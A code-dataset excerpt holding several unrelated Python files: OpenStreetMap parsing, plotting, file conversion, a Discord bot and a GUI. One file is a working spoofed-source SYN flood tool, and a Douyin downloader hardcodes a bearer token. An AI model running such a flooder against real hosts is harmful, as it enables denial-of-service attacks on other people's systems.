key\r\n \"\"\"\r\n node_attribs = {}\r\n node_tags = []\r\n \r\n # Save attributes\r\n for field in node_attr_fields:\r\n node_attribs[field] = element.attrib[field]\r\n\r\n # Go through the element and save tags\r\n for node in element:\r\n # Clean the tags for this node\r\n cleaned_tag_key, cleaned_tag_value = clean_tags(node.attrib['k'], node.attrib['v'])\r\n \r\n if PROBLEMCHARS.match(cleaned_tag_key):\r\n continue\r\n\r\n tag_dict = {}\r\n tag_dict['id'] = element.attrib['id']\r\n tag_dict['value'] = cleaned_tag_value\r\n\r\n # Keys could contain a key and type\r\n if ':' in node.attrib['k']:\r\n tag_dict['key'] = cleaned_tag_key.split(':', 1)[-1]\r\n tag_dict['type'] = cleaned_tag_key.split(':', 1)[0]\r\n else:\r\n tag_dict['key'] = cleaned_tag_key\r\n tag_dict['type'] = default_tag_type\r\n node_tags.append(tag_dict)\r\n\r\n return {'node': node_attribs, 'node_tags': node_tags}\r\n\r\n\r\ndef shape_way(element, way_attr_fields=WAY_FIELDS, problem_chars=PROBLEMCHARS,\r\n default_tag_type='regular'):\r\n \"\"\"\r\n Clean and shape way elements\r\n element = OSM XML element\r\n way_attr_fields = list of expected way attributes\r\n problem_chars = regular expression for keys we should ignore\r\n default_tag_type = indicate the type for a default key\r\n \"\"\"\r\n way_attribs = {}\r\n way_nodes = []\r\n way_tags = []\r\n\r\n # Save attributes \r\n for field in way_attr_fields:\r\n way_attribs[field] = element.attrib[field]\r\n\r\n # Go through the element and save tags\r\n n = 0\r\n for node in element: \r\n # node links\r\n if node.tag == \"nd\":\r\n way_node = {}\r\n way_node['id'] = element.attrib['id']\r\n way_node['node_id'] = node.attrib['ref']\r\n way_node['position'] = n\r\n way_nodes.append(way_node)\r\n n += 1\r\n # tags\r\n elif node.tag == \"tag\":\r\n # Clean the tags for this node\r\n cleaned_tag_key, cleaned_tag_value = clean_tags(node.attrib['k'], node.attrib['v'])\r\n \r\n if PROBLEMCHARS.match(cleaned_tag_key):\r\n continue\r\n\r\n tag_dict = {}\r\n tag_dict['id'] = element.attrib['id']\r\n tag_dict['value'] = cleaned_tag_value\r\n\r\n if ':' in node.attrib['k']:\r\n tag_dict['key'] = cleaned_tag_key.split(':', 1)[-1]\r\n tag_dict['type'] = cleaned_tag_key.split(':', 1)[0]\r\n else:\r\n tag_dict['key'] = cleaned_tag_key\r\n tag_dict['type'] = default_tag_type\r\n way_tags.append(tag_dict) \r\n \r\n return {'way': way_attribs, 'way_nodes': way_nodes, 'way_tags': way_tags}\r\n\r\n\r\ndef shape_element(element, node_attr_fields=NODE_FIELDS, way_attr_fields=WAY_FIELDS,\r\n problem_chars=PROBLEMCHARS, default_tag_type='regular'):\r\n\r\n \"\"\"Clean and shape node or way XML element to Python dict\"\"\"\r\n return_dict = {}\r\n\r\n # Process nodes\r\n if element.tag == 'node':\r\n return_dict = shape_node(element)\r\n # Process way\r\n elif element.tag == 'way':\r\n return_dict = shape_way(element)\r\n\r\n return return_dict\r\n\r\n# ================================================== #\r\n\r\n# Helper Functions #\r\n\r\n# ================================================== #\r\ndef get_element(osm_file, tags=('node', 'way', 'relation')):\r\n \"\"\"\r\n Yield element if it is the right type of tag\r\n osm_file = path to the OSM XML file\r\n tags = list of tags whose elements this shall yield\r\n \"\"\"\r\n context = ET.iterparse(osm_file, events=('start', 'end'))\r\n _, root = next(context)\r\n for event, elem in context:\r\n if event == 'end' and elem.tag in tags:\r\n yield elem\r\n root.clear()\r\n\r\n\r\nclass UnicodeDictWriter(csv.DictWriter, object):\r\n \"\"\"Extend csv.DictWriter to handle Unicode input\"\"\"\r\n def writerow(self, row):\r\n super(UnicodeDictWriter, self).writerow({\r\n #k:str(v).encode('utf-8') for k, v in row.items()\r\n k:v for k, v in row.items()\r\n })\r\n\r\n def writerows(self, rows):\r\n for row in rows:\r\n self.writerow(row)\r\n\r\n# ================================================== #\r\n\r\n# Main Function #\r\n\r\n# ================================================== #\r\n\r\ndef process_map(file_in, nodes_path, nodes_tags_path, ways_path, way_nodes_path, way_tags_path):\r\n \"\"\"\r\n Iteratively process each XML element and write to csv(s)\r\n file_in = XML OSM File\r\n \"\"\"\r\n \r\n # Operate on all output files (use codecs.open or regular open?)\r\n with codecs.open(nodes_path, 'w', encoding='utf-8') as nodes_file, \\\r\n codecs.open(nodes_tags_path, 'w', encoding='utf-8') as nodes_tags_file, \\\r\n codecs.open(ways_path, 'w', encoding='utf-8') as ways_file, \\\r\n codecs.open(way_nodes_path, 'w', encoding='utf-8') as way_nodes_file, \\\r\n codecs.open(way_tags_path, 'w', encoding='utf-8') as way_tags_file:\r\n\r\n nodes_writer = UnicodeDictWriter(nodes_file, NODE_FIELDS, lineterminator = '\\n')\r\n node_tags_writer = UnicodeDictWriter(nodes_tags_file, NODE_TAGS_FIELDS, lineterminator = '\\n')\r\n ways_writer = UnicodeDictWriter(ways_file, WAY_FIELDS, lineterminator = '\\n')\r\n way_nodes_writer = UnicodeDictWriter(way_nodes_file, WAY_NODES_FIELDS, lineterminator = '\\n')\r\n way_tags_writer = UnicodeDictWriter(way_tags_file, WAY_TAGS_FIELDS, lineterminator = '\\n')\r\n \r\n # nodes_writer.writeheader() Skip headers due to sqlite3 insertion error on primary key\r\n node_tags_writer.writeheader()\r\n # ways_writer.writeheader() Skip headers due to sqlite3 insertion error on primary key\r\n way_nodes_writer.writeheader()\r\n way_tags_writer.writeheader()\r\n\r\n # Loop through the node and way elements\r\n for element in get_element(file_in, tags=('node', 'way')):\r\n el = shape_element(element)\r\n if el:\r\n \r\n if element.tag == 'node':\r\n nodes_writer.writerow(el['node'])\r\n node_tags_writer.writerows(el['node_tags'])\r\n \r\n elif element.tag == 'way':\r\n ways_writer.writerow(el['way'])\r\n way_nodes_writer.writerows(el['way_nodes'])\r\n way_tags_writer.writerows(el['way_tags'])\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n # CSV Sample Output File Names\r\n NODES_PATH_SAMPLE = \"nodes_sample.csv\"\r\n NODES_TAGS_PATH_SAMPLE = \"nodes_tags_sample.csv\"\r\n WAYS_PATH_SAMPLE = \"ways_sample.csv\"\r\n WAY_NODES_PATH_SAMPLE = \"ways_nodes_sample.csv\"\r\n WAY_TAGS_PATH_SAMPLE = \"ways_tags_sample.csv\"\r\n\r\n # Process sample data set\r\n process_map('philadelphia_pennsylvania_sample.osm',\r\n NODES_PATH_SAMPLE, NODES_TAGS_PATH_SAMPLE,\r\n WAYS_PATH_SAMPLE, WAY_NODES_PATH_SAMPLE, WAY_TAGS_PATH_SAMPLE)\r\n \r\n # CSV Full Output File Names\r\n NODES_PATH_FULL = \"nodes.csv\"\r\n NODES_TAGS_PATH_FULL = \"nodes_tags.csv\"\r\n WAYS_PATH_FULL = \"ways.csv\"\r\n WAY_NODES_PATH_FULL = \"ways_nodes.csv\"\r\n WAY_TAGS_PATH_FULL = \"ways_tags.csv\"\r\n \r\n # Process full data set\r\n process_map('philadelphia_pennsylvania.osm',\r\n NODES_PATH_FULL, NODES_TAGS_PATH_FULL,\r\n WAYS_PATH_FULL, WAY_NODES_PATH_FULL, WAY_TAGS_PATH_FULL)", "repo_name": "William-McKee/udacity-data-analyst", "sub_path": "Open_Street_Map/open_street_process_map.py", "file_name": "open_street_process_map.py", "file_ext": "py", "file_size_in_byte": 14822, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "re.compile", "line_number": 166, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 167, "usage_type": "call"}, {"api_name": "open_street_clean.clean_tags", "line_number": 196, "usage_type": "call"}, {"api_name": "open_street_clean.clean_tags", "line_number": 248, "usage_type": "call"}, {"api_name": "xml.etree.cElementTree.iterparse", "line_number": 294, "usage_type": "call"}, {"api_name": "xml.etree.cElementTree", "line_number": 294, "usage_type": "name"}, {"api_name": "csv.DictWriter", "line_number": 302, "usage_type": "attribute"}, {"api_name": "codecs.open", "line_number": 327, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 328, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 329, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 330, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 331, "usage_type": "call"}]} +{"seq_id": "15396028939", "text": "#!/usr/bin/env python3\r\n\r\n\"\"\"Simple SYN Flooder and spoofer\r\n - @mjdubell\r\n\r\nThis software is intended for educational purposes and\r\ncan only be used against systems with permission from owner.\r\nThe user is the only one responsible for any damages. By using this\r\nsoftware you agree with the terms.\r\n\r\nUsage:\r\n multi_syn.py <dst_ip> <dst_port> [--workers=<amount>] [--sleep=<seconds>]\r\n\r\nOptions:\r\n -h, --help Show this screen.\r\n --version Show version.\r\n --workers=<amount> Amount of processes to use [default: 4].\r\n --sleep=<seconds> How many seconds to sleep betseen scans [default: 0].\r\n\r\n\"\"\"\r\nfrom docopt import docopt\r\nimport logging\r\nimport sys\r\nfrom multiprocessing import Process, current_process\r\nimport signal\r\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\r\nfrom scapy.all import *\r\n\r\n\r\ndef flood(src_net: str, dst_ip: str, dst_port: int, sleep: int):\r\n # the actual code that will be sending SYN packets\r\n for src_host in range(1, 254):\r\n for src_port in range(1024, 65535):\r\n # Build the packet\r\n src_ip = f\"{src_net}.{src_host}\"\r\n network_layer = IP(src=src_ip, dst=dst_ip)\r\n transport_layer = TCP(sport=src_port, dport=dst_port, flags=\"S\")\r\n\r\n # Send the packet\r\n try:\r\n send(network_layer/transport_layer, verbose=False)\r\n except Exception as e:\r\n print(f\"[-] Something went terribly wrong: {e}\")\r\n sys.exit()\r\n\r\n if sleep != 0:\r\n time.sleep(sleep)\r\n\r\n\r\ndef signal_handler(signal, frame):\r\n print(f\"\\n[-] CTRL+C, quiting...\")\r\n sys.exit(0)\r\n\r\n\r\ndef main(arguments):\r\n dst_ip = arguments[\"<dst_ip>\"]\r\n dst_port = int(arguments[\"<dst_port>\"])\r\n workers = int(arguments[\"--workers\"])\r\n sleep = int(arguments[\"--sleep\"])\r\n \r\n signal.signal(signal.SIGINT, signal_handler)\r\n\r\n if workers < 1:\r\n print(\"[-] You need at least 1 worker...\")\r\n sys.exit()\r\n\r\n print(\"[!] Starting Syn Flooder...\")\r\n print(f\"[~] Workers: {workers}\")\r\n print(f\"[~] Target IP: {dst_ip}\")\r\n\r\n processes = []\r\n for worker in range(1, workers+1):\r\n src_net = f\"10.10.{worker}\"\r\n p = Process(target=flood, args=(src_net, dst_ip, dst_port, sleep), daemon=True)\r\n processes.append(p)\r\n p.start()\r\n\r\n for process in processes:\r\n if process is not None:\r\n process.join()\r\n \r\n\r\n\r\nif __name__ == \"__main__\":\r\n arguments = docopt(__doc__, version=\"Multi SYN Flooder 1.0\")\r\n main(arguments)\r\n", "repo_name": "dubs3c/SYN-Flooder", "sub_path": "multi_syn.py", "file_name": "multi_syn.py", "file_ext": "py", "file_size_in_byte": 2596, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 26, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 52, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 61, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 61, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 74, "usage_type": "call"}, {"api_name": "docopt.docopt", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "31183891915", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 10 17:13:28 2021\nCompare flipped and non-flipped (weights signed or not) cross-resolution exponent analysis results.\nLoad fidelity arrays made with crossParcellationResolutionAnalysisExponents.py.\n\n@author: rouhinen\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n## Settings used in creating the plvArrays.\nresolutions = ['100', '200', '400', '597', '775', '942']\nexponents = [0, 1, 2, 4, 8, 16, 32]\n\n\n\"\"\" Load PLV arrays from files. \"\"\"\nplvArray_meth1_u = np.load(\"C:\\\\temp\\\\fWeighting\\\\numpyArrays\\\\plvArrays\\\\exponents0to32Unsigned\\\\plvArray_meth1.npy\")\nplvArray_meth2_u = np.load(\"C:\\\\temp\\\\fWeighting\\\\numpyArrays\\\\plvArrays\\\\exponents0to32Unsigned\\\\plvArray_meth2m.npy\")\nplvArray_meth1_f = np.load(\"C:\\\\temp\\\\fWeighting\\\\numpyArrays\\\\plvArrays\\\\exponents0to32Signed\\\\plvArray_meth1.npy\")\nplvArray_meth2_f = np.load(\"C:\\\\temp\\\\fWeighting\\\\numpyArrays\\\\plvArrays\\\\exponents0to32Signed\\\\plvArray_meth2m.npy\")\n\n\"\"\" Get relative fidelity means differences of flipped and unflipped. \"\"\"\ndef nonZeroMeans(zeroBufferedData, exponents, resolutions):\n \"\"\" zeroBufferedData shape: exponents x subjects x resolutions x resolutions x maxResolution. \"\"\"\n means = np.zeros((len(exponents), len(resolutions),len(resolutions)))\n for i1, resolution1 in enumerate(resolutions):\n for i2, resolution2 in enumerate(resolutions):\n for iexp, exponent in enumerate(exponents):\n nonZero = zeroBufferedData[iexp,:,i1,i2,:]\n nonZero = nonZero[nonZero != 0]\n means[iexp,i1,i2] = round(np.mean(nonZero), 4)\n return means\n\nmeans_meth1_u = nonZeroMeans(plvArray_meth1_u, exponents, resolutions) # Method 1 modeled resolution, non-flipped\nmeans_meth2_u = nonZeroMeans(plvArray_meth2_u, exponents, resolutions) # Method 2 modeled resolution, non-flipped\nmeans_meth1_f = nonZeroMeans(plvArray_meth1_f, exponents, resolutions) # Method 1 modeled resolution, flipped\nmeans_meth2_f = nonZeroMeans(plvArray_meth2_f, exponents, resolutions) # Method 2 modeled resolution, flipped\n\nmeans_meth1_r = means_meth1_u / means_meth1_f\nmeans_meth2_r = means_meth2_u / means_meth2_f\n\n\n\"\"\" Plot \"\"\"\n# Set global figure parameters, including CorelDraw compatibility (.fonttype)\nimport matplotlib.pylab as pylab\nparams = {'legend.fontsize':'7',\n 'figure.figsize':(2.0*len(exponents), 2.2),\n 'axes.labelsize':'7',\n 'axes.titlesize':'7',\n 'xtick.labelsize':'7',\n 'ytick.labelsize':'7',\n 'lines.linewidth':'0.5',\n 'font.family':'Arial',\n 'pdf.fonttype':42,\n 'ps.fonttype':42}\npylab.rcParams.update(params)\n\n\ndef heat_plot_exp(data, tickLabels, titleStrings, vmin=0.1, vmax=0.6, decimals=2, stripFirst0=False):\n # Data 3D, with first dimension sub-plots.\n columns = len(data)\n \n # Set a threshold where text should be black instead of white. \n middle = (vmax+vmin)/2\n textToKT = (vmax-vmin) * 0.15\n \n fig, ax = plt.subplots(1, columns)\n for i, datum in enumerate(data):\n ax[i].imshow(datum[::-1,:], cmap='seismic', vmin=vmin, vmax=vmax) # Visualize Y-axis down to up.\n \n # Show all ticks...\n ax[i].set_xticks(np.arange(len(tickLabels)))\n ax[i].set_yticks(np.arange(len(tickLabels)))\n # ... and label them with the respective list entries\n ax[i].set_xticklabels(tickLabels)\n ax[i].set_yticklabels(tickLabels[::-1]) # Reverse y-axis labels.\n \n # # Rotate the tick labels and set their alignment.\n # plt.setp(ax[i].get_xticklabels(), rotation=0, ha=\"right\",\n # rotation_mode=\"anchor\")\n \n # Loop over datum dimensions and create text annotations. Remove first character if stripFirst0=True.\n for ii in range(len(tickLabels)):\n for j in range(len(tickLabels)):\n value = round(datum[-ii-1, j], decimals)\n valueStr = str(value)[1:] if stripFirst0 == True else str(value) \n tcolor = \"w\" if np.abs(value-middle) > textToKT else \"k\" # Set text color to white if not near middle threshold, else to black.\n ax[i].text(j, ii, valueStr, ha=\"center\", va=\"center\", \n color=tcolor, fontsize=7)\n \n ax[i].set_title(titleStrings[i])\n ax[i].set_xlabel('Modeling resolution')\n ax[i].set_ylabel('Simulation resolution')\n \n fig.tight_layout()\n plt.show()\n\n\n# Method 1\nmaxDiffFromOne = np.max(np.abs([means_meth1_r, means_meth2_r])*100-100)\nvminR = -maxDiffFromOne\nvmaxR = maxDiffFromOne\n\nmeth1Strings = ['Unflipped/Flipped fidelity dif,\\nmethod1 (%), exponent ' + str(exponent) for exponent in exponents]\nheat_plot_exp(means_meth1_r*100-100, resolutions, meth1Strings, vmin=vminR, vmax=vmaxR, decimals=1)\n\n# Method 2\nmeth2Strings = ['Unflipped/Flipped fidelity dif,\\nmethod2 (%), exponent ' + str(exponent) for exponent in exponents]\nheat_plot_exp(means_meth2_r*100-100, resolutions, meth2Strings, vmin=vminR, vmax=vmaxR, decimals=1)\n\n\n\n## Means of relative all values, diagonal, upper and lower triangles without diagonal. \ndef means_withTriangles(data, resolutions, exponents, verbose=True):\n \"\"\" data : exponents x resolutions x resolutions. \n Output : 4 x resolutions, with first dimension means of whole array, upper triangle without \n diagonal indices, diagonal, and lower triangle without diagonal indices. \n Upper diagonal: higher modeling resolution than simulation resolution. \"\"\"\n decimals = 3\n mean_byExp = np.round([np.mean(means) for means in data], decimals)\n \n if verbose==True:\n for i, mean in enumerate(mean_byExp):\n print(f'Mean fidelity with exponent {exponents[i]} whole {mean}')\n \n # Upper, lower, diagonal means.\n iup = np.triu_indices(len(resolutions), 1) # Upper triangle without diagonal indices.\n idi = np.diag_indices(len(resolutions)) # Diagonal indices.\n ilo = np.tril_indices(len(resolutions), -1) # Lower triangle without diagonal indices.\n \n mean_byExp_up = np.round([np.mean(means[iup]) for means in data], decimals)\n mean_byExp_di = np.round([np.mean(means[idi]) for means in data], decimals)\n mean_byExp_lo = np.round([np.mean(means[ilo]) for means in data], decimals)\n \n if verbose==True:\n for i, mean_up in enumerate(mean_byExp_up):\n mean_di = mean_byExp_di[i]\n mean_lo = mean_byExp_lo[i]\n print(f'Mean fidelity with exponent {exponents[i]} upper {mean_up}, diagonal {mean_di}, lower {mean_lo}')\n \n return [mean_byExp, mean_byExp_up, mean_byExp_di, mean_byExp_lo]\n\nmeans_tri_meth1_rel = means_withTriangles(means_meth1_r, resolutions, exponents)\nmeans_tri_meth2_rel = means_withTriangles(means_meth2_r, resolutions, exponents)\n\n\n\n\n\n\n\n\n", "repo_name": "sanrou/fidelityWeighting", "sub_path": "compareFlippedAndUnflippedCrossResolutionFidelities.py", "file_name": "compareFlippedAndUnflippedCrossResolutionFidelities.py", "file_ext": "py", "file_size_in_byte": 6726, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "numpy.load", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pylab.rcParams.update", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pylab.rcParams", "line_number": 58, "usage_type": "attribute"}, {"api_name": "matplotlib.pylab", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.triu_indices", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.diag_indices", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.tril_indices", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "73336459805", "text": "#!/usr/bin/python3\n\nimport argparse\nimport glob\nimport os\nimport re\n\nimport win32com.client as win32\nfrom win32com.client import constants\n\ndef convert(root_path):\n \"\"\"Converts .doc files under root_path to .docx\"\"\"\n\n def save_as_docx(doc_path):\n \"Helper function that saves a .doc to .docx\"\n\n # open doc in word\n word = win32.gencache.EnsureDispatch('Word.Application')\n doc = word.Documents.Open(path)\n doc.Activate()\n\n docx_path = re.sub(r'\\.\\w+$', '.docx',\n os.path.abspath(doc_path))\n word.ActiveDocument.SaveAs(\n docx_path, FileFormat=constants.wdFormatXMLDocument)\n doc.Close(False)\n print(\"{} -> {}\".format(doc_path, docx_path))\n\n # Create list of paths to .doc files\n for path in glob.glob(\"{}/**/*.doc\".format(root_path),\n recursive=True):\n save_as_docx(path)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Converts .doc to docx.')\n parser.add_argument('path',\n help='folder path to look for .doc files')\n args = parser.parse_args()\n convert(args.path)\n", "repo_name": "lisaong/laughing-meme", "sub_path": "scripts/doc_to_docx.py", "file_name": "doc_to_docx.py", "file_ext": "py", "file_size_in_byte": 1130, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "win32com.client.gencache.EnsureDispatch", "line_number": 18, "usage_type": "call"}, {"api_name": "win32com.client.gencache", "line_number": 18, "usage_type": "attribute"}, {"api_name": "win32com.client", "line_number": 18, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "win32com.client.constants.wdFormatXMLDocument", "line_number": 25, "usage_type": "attribute"}, {"api_name": "win32com.client.constants", "line_number": 25, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 30, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "918026667", "text": "from typing import Any, List, Union\n\nfrom vuka.core import BaseObject\n\n\ndef is_vuka_object(obj: Any) -> bool:\n \"\"\"Test of obj for belonging to BaseObject.\n\n Args:\n obj: Any\n\n Returns:\n True, if the obj is an object of class BaseObject, else False\n \"\"\"\n if isinstance(obj, BaseObject):\n return True\n return False\n\n\ndef get_object_by_uuid(objects: List, uuid4: str) -> Union[Any]:\n \"\"\"\n\n Args:\n objects: vuka.core module class objects.\n uuid4: Universally unique identifier.\n\n Returns:\n vuka.core module class object.\n\n \"\"\"\n for obj in objects:\n if obj.uuid == uuid4:\n return obj\n return None\n", "repo_name": "Maxfashko/test_project_classifier", "sub_path": "libs/models-storage-common/vuka/utils/misc.py", "file_name": "misc.py", "file_ext": "py", "file_size_in_byte": 687, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "typing.Any", "line_number": 6, "usage_type": "name"}, {"api_name": "vuka.core.BaseObject", "line_number": 15, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "8635938008", "text": "import requests\r\nimport json\r\ntoken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxNjcwNzgzNDQ5fQ.cVTAEsCmyXg2h_ZRQJaMPYln0ujb-qGIkbNi0P64A60'\r\nurl1 = 'https://api-v2.douyin.wtf/douyin_profile_videos/'\r\nvideourl = 'https://v.douyin.com/hBXAnqb/'\r\ncount = 4\r\ntoken = \"Bearer\" + \" \" + token\r\nheaders={\r\n \"authorization\": token\r\n}\r\nk =[]\r\ni = 0\r\nparameters = {'douyin_profile_url':videourl,'count':count}#加入参数来筛选数值\r\npro_res = requests.get(url1,headers=headers,params=parameters)\r\ndata1 = pro_res.content.decode()\r\na = json.loads(data1)\r\nb = a['aweme_list']\r\nfor c in b:\r\n d = c['video']\r\n e = d['play_addr']\r\n f = e['url_list'][0]\r\n k.append(f)\r\nwhile i < count:\r\n t = k[i]\r\n downlist = requests.get(t)\r\n with open(r'D:\\下载视频源\\page%s.mp4'%(i), 'wb') as e:\r\n e.write(downlist.content)\r\n i += 1\r\nprint(\"完成\")\r\n\r\n", "repo_name": "lioneltest2324/test", "sub_path": "抖音-北京动物园.py", "file_name": "抖音-北京动物园.py", "file_ext": "py", "file_size_in_byte": 865, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "73283610525", "text": "import aiohttp\nfrom discord.ext import commands\n\n\nclass Web:\n def __init__(self, client):\n self.client = client\n\n @commands.command(name='u',\n help='Returns search term from urbandictionary.com')\n async def urban(self, *, search_term):\n search_term = aiohttp.helpers.requote_uri(search_term)\n session = aiohttp.ClientSession()\n async with session.get('http://api.urbandictionary.com/v0/define?term={}'.format(search_term)) as resp:\n assert resp.status == 200\n resp_parsed = await resp.json()\n resp_msg = resp_parsed['list'][0]['definition'][:1900] if resp_parsed['list'] else 'Something went wrong \\U0001F641'\n await self.client.reply('{}'.format(resp_msg))\n\n\ndef setup(client):\n client.add_cog(Web(client))\n", "repo_name": "Grifs99/Refrigerator", "sub_path": "exts/web.py", "file_name": "web.py", "file_ext": "py", "file_size_in_byte": 813, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "aiohttp.helpers.requote_uri", "line_number": 12, "usage_type": "call"}, {"api_name": "aiohttp.helpers", "line_number": 12, "usage_type": "attribute"}, {"api_name": "aiohttp.ClientSession", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 9, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "5603858718", "text": "\nimport sys\nfrom PyQt5.QtWidgets import (QWidget, QPushButton, QHBoxLayout, QVBoxLayout, QApplication, QLineEdit)\nimport wykres\nimport numpy as np\n\nclass Example(QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n #widgety\n #wykres\n Wykres = wykres.TestWindow()\n npoints = 1000000\n xdata = np.linspace(0., 10., npoints)\n Wykres.add_data(xdata, np.sin(xdata))\n Wykres.add_data(xdata, np.cos(xdata))\n Wykres.set_title(\"Simple example with %d curves of %d points \" \\\n \"(OpenGL Accelerated Series)\" \\\n % (Wykres.ncurves, npoints))\n Wykres.setWindowTitle(\"Simple performance example\")\n Wykres.show()\n Wykres.resize(500, 500)\n\n mapa = QPushButton(\"mapa\")\n kompas = QPushButton(\"kompas\")\n up = QPushButton(\"W\")\n down = QPushButton(\"S\")\n left = QPushButton(\"A\")\n right = QPushButton(\"D\")\n P1_disp = QLineEdit(\"P\")\n P1_add = QPushButton()\n P1_sub = QPushButton()\n I1_disp = QLineEdit(\"I\")\n I1_add = QPushButton()\n I1_sub = QPushButton()\n D1_disp = QLineEdit(\"D\")\n D1_add = QPushButton()\n D1_sub = QPushButton()\n P2_disp = QLineEdit(\"P\")\n P2_add = QPushButton()\n P2_sub = QPushButton()\n I2_disp = QLineEdit(\"I\")\n I2_add = QPushButton()\n I2_sub = QPushButton()\n D2_disp = QLineEdit(\"D\")\n D2_add = QPushButton()\n D2_sub = QPushButton()\n\n #P1\n P1 = QVBoxLayout()\n P1.addWidget(P1_add)\n P1.addWidget(P1_disp)\n P1.addWidget(P1_sub)\n\n #I1\n I1 = QVBoxLayout()\n I1.addWidget(I1_add)\n I1.addWidget(I1_disp)\n I1.addWidget(I1_sub)\n\n #D1\n D1 = QVBoxLayout()\n D1.addWidget(D1_add)\n D1.addWidget(D1_disp)\n D1.addWidget(D1_sub)\n\n # P2\n P2 = QVBoxLayout()\n P2.addWidget(P2_add)\n P2.addWidget(P2_disp)\n P2.addWidget(P2_sub)\n\n #I2\n I2 = QVBoxLayout()\n I2.addWidget(I2_add)\n I2.addWidget(I2_disp)\n I2.addWidget(I2_sub)\n\n #D2\n D2 = QVBoxLayout()\n D2.addWidget(D2_add)\n D2.addWidget(D2_disp)\n D2.addWidget(D2_sub)\n\n #strzalki\n strzalki_gora = QHBoxLayout()\n strzalki_gora.addSpacing(100)\n strzalki_gora.addWidget(up)\n strzalki_gora.addSpacing(100)\n\n strzalki_dol = QHBoxLayout()\n strzalki_dol.addWidget(left)\n strzalki_dol.addWidget(down)\n strzalki_dol.addWidget(right)\n\n strzalki = QVBoxLayout()\n strzalki.addLayout(strzalki_gora)\n strzalki.addLayout(strzalki_dol)\n\n #pidy\n pidy_gora = QHBoxLayout()\n pidy_gora.addLayout(P1)\n pidy_gora.addLayout(I1)\n pidy_gora.addLayout(D1)\n\n pidy_dol = 